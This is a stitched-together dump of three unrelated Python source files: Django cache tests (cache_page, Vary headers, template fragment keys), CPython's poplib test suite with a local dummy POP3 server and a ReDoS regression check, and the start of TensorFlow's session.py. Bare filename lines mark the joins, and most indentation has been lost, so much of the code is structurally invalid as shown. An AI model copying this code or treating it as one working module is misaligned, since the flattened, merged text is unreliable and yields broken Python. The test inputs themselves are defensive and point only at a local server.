caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
        # ... but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
        # ... even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_cache_page_timeout(self):
# Page timeout takes precedence over the "max-age" section of the
# "Cache-Control".
tests = [
(1, 3), # max_age < page_timeout.
(3, 1), # max_age > page_timeout.
]
for max_age, page_timeout in tests:
with self.subTest(max_age=max_age, page_timeout=page_timeout):
view = cache_page(timeout=page_timeout)(
cache_control(max_age=max_age)(hello_world_view)
)
request = self.factory.get('/view/')
response = view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
time.sleep(1)
response = view(request, '2')
self.assertEqual(
response.content,
b'Hello World 1' if page_timeout > max_age else b'Hello World 2',
)
cache.clear()
def test_cached_control_private_not_cached(self):
"""Responses with 'Cache-Control: private' are not cached."""
view_with_private_cache = cache_page(3)(cache_control(private=True)(hello_world_view))
request = self.factory.get('/view/')
response = view_with_private_cache(request, '1')
self.assertEqual(response.content, b'Hello World 1')
response = view_with_private_cache(request, '2')
self.assertEqual(response.content, b'Hello World 2')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
request = self.factory.get('/view/')
csrf_middleware = CsrfViewMiddleware(csrf_view)
csrf_middleware.process_view(request, csrf_view, (), {})
cache_middleware = CacheMiddleware(csrf_middleware)
self.assertIsNone(cache_middleware.process_request(request))
cache_middleware(request)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
def test_304_response_has_http_caching_headers_but_not_cached(self):
original_view = mock.Mock(return_value=HttpResponseNotModified())
view = cache_page(2)(original_view)
request = self.factory.get('/view/')
# The view shouldn't be cached on the second call.
view(request).close()
response = view(request)
response.close()
self.assertEqual(original_view.call_count, 2)
self.assertIsInstance(response, HttpResponseNotModified)
self.assertIn('Cache-Control', response)
self.assertIn('Expires', response)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(SimpleTestCase):
"""
    Tests various headers with TemplateResponse.
    Most are probably redundant since they manipulate the same object
    anyway, but the ETag header is 'special' because it relies on the
    content being complete (which is not always the case with a
    TemplateResponse).
"""
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
if initial_vary is not None:
response.headers['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response.headers['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
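        # The learned key appears to be composed of the
        # 'views.decorators.cache.cache_page' namespace, the key prefix, the
        # request method, an MD5 of the request URL, and an MD5 of the values
        # of the headers named in the response's Vary header (none here, so
        # the final component is the MD5 of the empty string).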
# A specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# The querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
class TestMakeTemplateFragmentKey(SimpleTestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key, 'template.cache.foo.493e283d571a73056196f1a68efd0f66')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key, 'template.cache.bar.17c1a507a0cb58384f4c639067a93520')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key, 'template.cache.spam.06c8ae8e8c430b69fb0a6443504153dc')
def test_with_ints_vary_on(self):
key = make_template_fragment_key('foo', [1, 2, 3, 4, 5])
self.assertEqual(key, 'template.cache.foo.7ae8fd2e0d25d651c683bdeebdb29461')
def test_with_unicode_vary_on(self):
key = make_template_fragment_key('foo', ['42º', '😀'])
self.assertEqual(key, 'template.cache.foo.7ced1c94e543668590ba39b3c08b0237')
def test_long_vary_on(self):
key = make_template_fragment_key('foo', ['x' * 10000])
self.assertEqual(key, 'template.cache.foo.3670b349b5124aa56bdb50678b02b23a')
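    # All of the expected keys above appear to follow the pattern
    # 'template.cache.<fragment_name>.<MD5 digest of the vary_on values>';
    # with no vary_on values the digest is the MD5 of empty input
    # (d41d8cd98f00b204e9800998ecf8427e in test_without_vary_on).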
class CacheHandlerTest(SimpleTestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertIs(cache1, cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertIsNot(c[0], c[1])
def test_nonexistent_alias(self):
msg = "The connection 'nonexistent' doesn't exist."
with self.assertRaisesMessage(InvalidCacheBackendError, msg):
caches['nonexistent']
def test_nonexistent_backend(self):
test_caches = CacheHandler({
'invalid_backend': {
'BACKEND': 'django.nonexistent.NonexistentBackend',
},
})
msg = (
"Could not find backend 'django.nonexistent.NonexistentBackend': "
"No module named 'django.nonexistent'"
)
with self.assertRaisesMessage(InvalidCacheBackendError, msg):
test_caches['invalid_backend']
def test_all(self):
test_caches = CacheHandler({
'cache_1': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
},
'cache_2': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
},
})
self.assertEqual(test_caches.all(initialized_only=True), [])
cache_1 = test_caches['cache_1']
self.assertEqual(test_caches.all(initialized_only=True), [cache_1])
self.assertEqual(len(test_caches.all()), 2)
# .all() initializes all caches.
self.assertEqual(len(test_caches.all(initialized_only=True)), 2)
self.assertEqual(test_caches.all(), test_caches.all(initialized_only=True))
|
test_poplib.py
|
"""Test script for poplib module."""
# Modified by Giampaolo Rodola' to give poplib.POP3 and poplib.POP3_SSL
# a real test suite
import poplib
import asyncore
import asynchat
import socket
import os
import errno
import threading
import unittest
from unittest import TestCase, skipUnless
from test import support as test_support
from test.support import hashlib_helper
from test.support import socket_helper
HOST = socket_helper.HOST
PORT = 0
SUPPORTS_SSL = False
if hasattr(poplib, 'POP3_SSL'):
import ssl
SUPPORTS_SSL = True
CERTFILE = os.path.join(os.path.dirname(__file__) or os.curdir, "keycert3.pem")
CAFILE = os.path.join(os.path.dirname(__file__) or os.curdir, "pycacert.pem")
requires_ssl = skipUnless(SUPPORTS_SSL, 'SSL not supported')
# the dummy data returned by the server when LIST and RETR commands are issued
LIST_RESP = b'1 1\r\n2 2\r\n3 3\r\n4 4\r\n5 5\r\n.\r\n'
RETR_RESP = b"""From: [email protected]\
\r\nContent-Type: text/plain\r\n\
MIME-Version: 1.0\r\n\
Subject: Dummy\r\n\
\r\n\
line1\r\n\
line2\r\n\
line3\r\n\
.\r\n"""
class DummyPOP3Handler(asynchat.async_chat):
CAPAS = {'UIDL': [], 'IMPLEMENTATION': ['python-testlib-pop-server']}
enable_UTF8 = False
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.set_terminator(b"\r\n")
self.in_buffer = []
self.push('+OK dummy pop3 server ready. <timestamp>')
self.tls_active = False
self.tls_starting = False
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer)
line = str(line, 'ISO-8859-1')
self.in_buffer = []
cmd = line.split(' ')[0].lower()
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('-ERR unrecognized POP3 command "%s".' %cmd)
def handle_error(self):
raise
def push(self, data):
asynchat.async_chat.push(self, data.encode("ISO-8859-1") + b'\r\n')
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_user(self, arg):
if arg != "guido":
self.push("-ERR no such user")
self.push('+OK password required')
def cmd_pass(self, arg):
if arg != "python":
self.push("-ERR wrong password")
self.push('+OK 10 messages')
def cmd_stat(self, arg):
self.push('+OK 10 100')
def cmd_list(self, arg):
if arg:
self.push('+OK %s %s' % (arg, arg))
else:
self.push('+OK')
asynchat.async_chat.push(self, LIST_RESP)
cmd_uidl = cmd_list
def cmd_retr(self, arg):
self.push('+OK %s bytes' %len(RETR_RESP))
asynchat.async_chat.push(self, RETR_RESP)
cmd_top = cmd_retr
def cmd_dele(self, arg):
self.push('+OK message marked for deletion.')
def cmd_noop(self, arg):
self.push('+OK done nothing.')
def cmd_rpop(self, arg):
self.push('+OK done nothing.')
def cmd_apop(self, arg):
self.push('+OK done nothing.')
def cmd_quit(self, arg):
self.push('+OK closing.')
self.close_when_done()
def _get_capas(self):
_capas = dict(self.CAPAS)
if not self.tls_active and SUPPORTS_SSL:
_capas['STLS'] = []
return _capas
def cmd_capa(self, arg):
self.push('+OK Capability list follows')
if self._get_capas():
for cap, params in self._get_capas().items():
_ln = [cap]
if params:
_ln.extend(params)
self.push(' '.join(_ln))
self.push('.')
def cmd_utf8(self, arg):
self.push('+OK I know RFC6856'
if self.enable_UTF8
else '-ERR What is UTF8?!')
if SUPPORTS_SSL:
def cmd_stls(self, arg):
if self.tls_active is False:
self.push('+OK Begin TLS negotiation')
context = ssl.SSLContext()
context.load_cert_chain(CERTFILE)
tls_sock = context.wrap_socket(self.socket,
server_side=True,
do_handshake_on_connect=False,
suppress_ragged_eofs=False)
self.del_channel()
self.set_socket(tls_sock)
self.tls_active = True
self.tls_starting = True
self.in_buffer = []
self._do_tls_handshake()
else:
self.push('-ERR Command not permitted when TLS active')
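        # The handshake is driven incrementally: while tls_starting is True,
        # handle_read() keeps calling _do_tls_handshake() until the wrapped
        # socket finishes negotiating (or the peer disconnects).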
def _do_tls_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
# TODO: SSLError does not expose alert information
elif ("SSLV3_ALERT_BAD_CERTIFICATE" in err.args[1] or
"SSLV3_ALERT_CERTIFICATE_UNKNOWN" in err.args[1]):
return self.handle_close()
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self.tls_active = True
self.tls_starting = False
def handle_read(self):
if self.tls_starting:
self._do_tls_handshake()
else:
try:
asynchat.async_chat.handle_read(self)
except ssl.SSLEOFError:
self.handle_close()
class DummyPOP3Server(asyncore.dispatcher, threading.Thread):
handler = DummyPOP3Handler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.daemon = True
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
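    # start() blocks on the event until run() has set `active` and signalled
    # it, so callers never race the server thread; stop() clears `active` and
    # joins.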
def run(self):
self.active = True
self.__flag.set()
try:
while self.active and asyncore.socket_map:
with self.active_lock:
asyncore.loop(timeout=0.1, count=1)
finally:
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise
class TestPOP3Class(TestCase):
def assertOK(self, resp):
self.assertTrue(resp.startswith(b"+OK"))
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.start()
self.client = poplib.POP3(self.server.host, self.server.port,
timeout=test_support.LOOPBACK_TIMEOUT)
def tearDown(self):
self.client.close()
self.server.stop()
# Explicitly clear the attribute to prevent dangling thread
self.server = None
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(),
b'+OK dummy pop3 server ready. <timestamp>')
def test_exceptions(self):
self.assertRaises(poplib.error_proto, self.client._shortcmd, 'echo -err')
def test_user(self):
self.assertOK(self.client.user('guido'))
self.assertRaises(poplib.error_proto, self.client.user, 'invalid')
def test_pass_(self):
self.assertOK(self.client.pass_('python'))
self.assertRaises(poplib.error_proto, self.client.user, 'invalid')
def test_stat(self):
self.assertEqual(self.client.stat(), (10, 100))
def test_list(self):
self.assertEqual(self.client.list()[1:],
([b'1 1', b'2 2', b'3 3', b'4 4', b'5 5'],
25))
self.assertTrue(self.client.list('1').endswith(b"OK 1 1"))
def test_retr(self):
expected = (b'+OK 116 bytes',
[b'From: [email protected]', b'Content-Type: text/plain',
b'MIME-Version: 1.0', b'Subject: Dummy',
b'', b'line1', b'line2', b'line3'],
113)
foo = self.client.retr('foo')
self.assertEqual(foo, expected)
def test_too_long_lines(self):
self.assertRaises(poplib.error_proto, self.client._shortcmd,
'echo +%s' % ((poplib._MAXLINE + 10) * 'a'))
def test_dele(self):
self.assertOK(self.client.dele('foo'))
def test_noop(self):
self.assertOK(self.client.noop())
def test_rpop(self):
self.assertOK(self.client.rpop('foo'))
@hashlib_helper.requires_hashdigest('md5', openssl=True)
def test_apop_normal(self):
self.assertOK(self.client.apop('foo', 'dummypassword'))
@hashlib_helper.requires_hashdigest('md5', openssl=True)
def test_apop_REDOS(self):
# Replace welcome with very long evil welcome.
# NB The upper bound on welcome length is currently 2048.
# At this length, evil input makes each apop call take
# on the order of milliseconds instead of microseconds.
evil_welcome = b'+OK' + (b'<' * 1000000)
with test_support.swap_attr(self.client, 'welcome', evil_welcome):
# The evil welcome is invalid, so apop should throw.
self.assertRaises(poplib.error_proto, self.client.apop, 'a', 'kb')
def test_top(self):
expected = (b'+OK 116 bytes',
[b'From: [email protected]', b'Content-Type: text/plain',
b'MIME-Version: 1.0', b'Subject: Dummy', b'',
b'line1', b'line2', b'line3'],
113)
self.assertEqual(self.client.top(1, 1), expected)
def test_uidl(self):
self.client.uidl()
self.client.uidl('foo')
def test_utf8_raises_if_unsupported(self):
self.server.handler.enable_UTF8 = False
self.assertRaises(poplib.error_proto, self.client.utf8)
def test_utf8(self):
self.server.handler.enable_UTF8 = True
expected = b'+OK I know RFC6856'
result = self.client.utf8()
self.assertEqual(result, expected)
def test_capa(self):
capa = self.client.capa()
self.assertTrue('IMPLEMENTATION' in capa.keys())
def test_quit(self):
resp = self.client.quit()
self.assertTrue(resp)
self.assertIsNone(self.client.sock)
self.assertIsNone(self.client.file)
@requires_ssl
def test_stls_capa(self):
capa = self.client.capa()
self.assertTrue('STLS' in capa.keys())
@requires_ssl
def test_stls(self):
expected = b'+OK Begin TLS negotiation'
resp = self.client.stls()
self.assertEqual(resp, expected)
@requires_ssl
def test_stls_context(self):
expected = b'+OK Begin TLS negotiation'
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(CAFILE)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.check_hostname, True)
with self.assertRaises(ssl.CertificateError):
resp = self.client.stls(context=ctx)
self.client = poplib.POP3("localhost", self.server.port,
timeout=test_support.LOOPBACK_TIMEOUT)
resp = self.client.stls(context=ctx)
self.assertEqual(resp, expected)
if SUPPORTS_SSL:
from test.test_ftplib import SSLConnection
class DummyPOP3_SSLHandler(SSLConnection, DummyPOP3Handler):
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.secure_connection()
self.set_terminator(b"\r\n")
self.in_buffer = []
self.push('+OK dummy pop3 server ready. <timestamp>')
self.tls_active = True
self.tls_starting = False
@requires_ssl
class TestPOP3_SSLClass(TestPOP3Class):
# repeat previous tests by using poplib.POP3_SSL
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.handler = DummyPOP3_SSLHandler
self.server.start()
self.client = poplib.POP3_SSL(self.server.host, self.server.port)
def test__all__(self):
self.assertIn('POP3_SSL', poplib.__all__)
def test_context(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, keyfile=CERTFILE, context=ctx)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, certfile=CERTFILE, context=ctx)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, keyfile=CERTFILE,
certfile=CERTFILE, context=ctx)
self.client.quit()
self.client = poplib.POP3_SSL(self.server.host, self.server.port,
context=ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.assertIs(self.client.sock.context, ctx)
self.assertTrue(self.client.noop().startswith(b'+OK'))
def test_stls(self):
self.assertRaises(poplib.error_proto, self.client.stls)
test_stls_context = test_stls
def test_stls_capa(self):
capa = self.client.capa()
self.assertFalse('STLS' in capa.keys())
@requires_ssl
class TestPOP3_TLSClass(TestPOP3Class):
# repeat previous tests by using poplib.POP3.stls()
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.start()
self.client = poplib.POP3(self.server.host, self.server.port,
timeout=test_support.LOOPBACK_TIMEOUT)
self.client.stls()
def tearDown(self):
if self.client.file is not None and self.client.sock is not None:
try:
self.client.quit()
except poplib.error_proto:
# happens in the test_too_long_lines case; the overlong
# response will be treated as response to QUIT and raise
# this exception
self.client.close()
self.server.stop()
# Explicitly clear the attribute to prevent dangling thread
self.server = None
def test_stls(self):
self.assertRaises(poplib.error_proto, self.client.stls)
test_stls_context = test_stls
def test_stls_capa(self):
capa = self.client.capa()
self.assertFalse(b'STLS' in capa.keys())
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.settimeout(60)  # Safety net. See issue 11812.
self.port = socket_helper.bind_port(self.sock)
self.thread = threading.Thread(target=self.server, args=(self.evt, self.sock))
self.thread.daemon = True
self.thread.start()
self.evt.wait()
def tearDown(self):
self.thread.join()
# Explicitly clear the attribute to prevent dangling thread
self.thread = None
def server(self, evt, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
conn.send(b"+ Hola mundo\n")
conn.close()
except socket.timeout:
pass
finally:
serv.close()
def testTimeoutDefault(self):
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(test_support.LOOPBACK_TIMEOUT)
try:
pop = poplib.POP3(HOST, self.port)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(pop.sock.gettimeout(), test_support.LOOPBACK_TIMEOUT)
pop.close()
def testTimeoutNone(self):
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
pop = poplib.POP3(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(pop.sock.gettimeout())
pop.close()
def testTimeoutValue(self):
pop = poplib.POP3(HOST, self.port, timeout=test_support.LOOPBACK_TIMEOUT)
self.assertEqual(pop.sock.gettimeout(), test_support.LOOPBACK_TIMEOUT)
pop.close()
with self.assertRaises(ValueError):
poplib.POP3(HOST, self.port, timeout=0)
def setUpModule():
thread_info = test_support.threading_setup()
unittest.addModuleCleanup(test_support.threading_cleanup, *thread_info)
if __name__ == '__main__':
unittest.main()
|
session.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A client interface for TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import re
import threading
import warnings
import numpy as np
import wrapt
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow as tf_session
from tensorflow.python.eager import context
from tensorflow.python.eager import monitoring
from tensorflow.python.framework import device
from tensorflow.python.framework import error_interpolation
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import session_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training.experimental import mixed_precision_global_state
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util.tf_export import tf_export
from tensorflow.python.util.compat import collections_abc
_python_session_create_counter = monitoring.Counter(
'/tensorflow/api/python/session_create_counter',
'Counter for number of sessions created in Python.')
class SessionInterface(object):
"""Base class for implementations of TensorFlow client sessions."""
@property
def graph(self):
"""The underlying TensorFlow graph, to be used in building Operations."""
raise NotImplementedError('graph')
@property
def sess_str(self):
"""The TensorFlow process to which this session will connect."""
raise NotImplementedError('sess_str')
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Runs operations in the session. See `BaseSession.run()` for details."""
raise NotImplementedError('run')
def partial_run_setup(self, fetches, feeds=None):
"""Sets up the feeds and fetches for partial runs in the session."""
raise NotImplementedError('partial_run_setup')
def partial_run(self, handle, fetches, feed_dict=None):
"""Continues the execution with additional feeds and fetches."""
raise NotImplementedError('partial_run')
def _get_indexed_slices_value_from_fetches(fetched_vals):
return ops.IndexedSlicesValue(
fetched_vals[0], fetched_vals[1],
fetched_vals[2] if len(fetched_vals) == 3 else None)
def _get_feeds_for_indexed_slices(feed, feed_val):
return list(
zip([feed.values, feed.indices] if feed.dense_shape is None else
[feed.values, feed.indices, feed.dense_shape], feed_val))
# List of extensions supported to convert run arguments into actual fetches and
# feeds.
#
# Each element in the list is a tuple of (Type, fetch_fn, feed_fn1, feed_fn2),
# where the function signatures are:
# fetch_fn : Type -> (list of Tensors,
# lambda: list of fetched np.ndarray -> TypeVal)
# feed_fn1 : Type, TypeVal -> list of (Tensor, value)
# feed_fn2 : Type -> list of Tensors
#
# `fetch_fn` describes how to expand fetch into its
# component Tensors and how to contract the fetched results back into
# a single return value.
#
# Each feed function describes how to unpack a single fed value and map it to
# feeds of one or more tensors and their corresponding values: `feed_fn1` is
# used to feed a run, `feed_fn2` to set up a partial run.
#
# TODO(touts): We could reimplement these as specialized _FeedMapper
# implementations after we refactor the feed handling code to use them.
#
# Eventually, this registration could be opened up to support custom Tensor
# expansions.
# pylint: disable=g-long-lambda
_REGISTERED_EXPANSIONS = [
# SparseTensors are fetched as SparseTensorValues. They can be fed
# SparseTensorValues or normal tuples.
(sparse_tensor.SparseTensor, lambda fetch: ([
fetch.indices, fetch.values, fetch.dense_shape
], lambda fetched_vals: sparse_tensor.SparseTensorValue(*fetched_vals)),
lambda feed, feed_val: list(
zip([feed.indices, feed.values, feed.dense_shape], feed_val)),
lambda feed: [feed.indices, feed.values, feed.dense_shape]),
# IndexedSlices are fetched as IndexedSlicesValues. They can be fed
# IndexedSlicesValues or normal tuples.
(ops.IndexedSlices,
lambda fetch: ([fetch.values, fetch.indices] if fetch.dense_shape is None
else [fetch.values, fetch.indices, fetch.dense_shape
], _get_indexed_slices_value_from_fetches),
_get_feeds_for_indexed_slices,
lambda feed: [feed.values, feed.indices] if feed.dense_shape is None else
[feed.values, feed.indices, feed.dense_shape]),
# The default catches all other types and performs no expansions.
(object, lambda fetch: ([fetch], lambda fetched_vals: fetched_vals[0]),
lambda feed, feed_val: [(feed, feed_val)], lambda feed: [feed])
]
# pylint: enable=g-long-lambda
def _convert_to_numpy_obj(numpy_dtype, obj):
"""Explicitly convert obj based on numpy type except for string type."""
return numpy_dtype(obj) if numpy_dtype is not object else str(obj)
def register_session_run_conversion_functions(
tensor_type,
fetch_function,
feed_function=None,
feed_function_for_partial_run=None):
"""Register fetch and feed conversion functions for `tf.Session.run()`.
This function registers a triple of conversion functions for fetching and/or
feeding values of user-defined types in a call to tf.Session.run().
An example
```python
class SquaredTensor(object):
def __init__(self, tensor):
self.sq = tf.square(tensor)
  # You can define conversion functions as follows:
fetch_function = lambda squared_tensor:([squared_tensor.sq],
lambda val: val[0])
feed_function = lambda feed, feed_val: [(feed.sq, feed_val)]
feed_function_for_partial_run = lambda feed: [feed.sq]
  # Then, after invoking this registration function, you can use it as follows:
session.run(squared_tensor1,
feed_dict = {squared_tensor2 : some_numpy_array})
```
Args:
tensor_type: The type for which you want to register a conversion function.
fetch_function: A callable that takes an object of type `tensor_type` and
returns a tuple, where the first element is a list of `tf.Tensor` objects,
and the second element is a callable that takes a list of ndarrays and
returns an object of some value type that corresponds to `tensor_type`.
fetch_function describes how to expand fetch into its component Tensors
and how to contract the fetched results back into a single return value.
feed_function: A callable that takes feed_key and feed_value as input, and
returns a list of tuples (feed_tensor, feed_val), feed_key must have type
`tensor_type`, and feed_tensor must have type `tf.Tensor`. Each feed
function describes how to unpack a single fed value and map it to feeds of
one or more tensors and their corresponding values.
feed_function_for_partial_run: A callable for specifying tensor values to
feed when setting up a partial run, which takes a `tensor_type` type
object as input, and returns a list of Tensors.
Raises:
ValueError: If `tensor_type` has already been registered.
"""
for conversion_function in _REGISTERED_EXPANSIONS:
if issubclass(conversion_function[0], tensor_type):
      raise ValueError('%s has already been registered.' % tensor_type)
_REGISTERED_EXPANSIONS.insert(0, (tensor_type, fetch_function, feed_function,
feed_function_for_partial_run))
def _is_attrs_instance(obj):
"""Returns True if the given obj is an instance of attrs-decorated class."""
return getattr(obj.__class__, '__attrs_attrs__', None) is not None
def _get_attrs_values(obj):
"""Returns the list of values from an attrs instance."""
attrs = getattr(obj.__class__, '__attrs_attrs__')
return [getattr(obj, a.name) for a in attrs]
class _FetchMapper(object):
"""Definition of the interface provided by fetch mappers.
Fetch mappers are utility classes used by the _FetchHandler to handle
arbitrary structures for the `fetch` argument to `Session.run()`.
The `fetch` argument can be of various shapes: single tensor or op, list of
fetches, tuple of fetches, namedtuple of fetches, or dict of fetches. The
structures can be arbitrarily nested.
The low level run() API only wants a list of tensor or op names. The various
`_FetchMapper` subclasses below take care of handling the different shapes:
uniquifying the fetches, and constructing results with the original shape.
"""
def unique_fetches(self):
"""Return the list of unique tensors or ops needed by this fetch mapper.
Returns:
A list of tensors or ops.
"""
raise NotImplementedError('Must be implemented by subclasses')
def build_results(self, values):
"""Build results that match the original shape of the fetch.
Args:
values: List of values returned by run(). The values correspond exactly to
        the list of tensors or ops returned by unique_fetches().
Returns:
A struct of the same shape as the original fetch object handled by
this fetch mapper. In the returned struct, the original fetches are
replaced by their fetched values.
"""
raise NotImplementedError('Must be implemented by subclasses')
@staticmethod
def for_fetch(fetch):
"""Creates fetch mapper that handles the structure of `fetch`.
The default graph must be the one from which we want to fetch values when
this function is called.
Args:
fetch: An arbitrary fetch structure: singleton, list, tuple, namedtuple,
or dict.
Returns:
An instance of a subclass of `_FetchMapper` that handles the shape.
"""
if fetch is None:
raise TypeError('Fetch argument %r has invalid type %r' %
(fetch, type(fetch)))
elif isinstance(fetch, (list, tuple)):
# NOTE(touts): This is also the code path for namedtuples.
return _ListFetchMapper(fetch)
elif isinstance(fetch, collections_abc.Mapping):
return _DictFetchMapper(fetch)
